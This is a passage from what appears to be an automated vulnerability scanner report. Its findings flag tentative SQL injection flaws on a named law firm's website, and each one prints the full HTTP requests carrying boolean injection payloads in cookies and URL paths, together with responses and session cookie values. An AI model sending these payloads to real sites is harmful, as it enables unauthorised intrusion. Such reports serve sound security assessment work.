<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 15781207'%20or%201%3d1--%20 and 15781207'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:45:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 18340356'%20or%201%3d1--%20 and 18340356'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:45:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18146897'%20or%201%3d1--%20 and 18146897'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts18146897'%20or%201%3d1--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts18146897'%20or%201%3d2--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41613986'%20or%201%3d1--%20 and 41613986'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/general.css41613986'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/general.css41613986'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 92255674%20or%201%3d1--%20 and 92255674%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
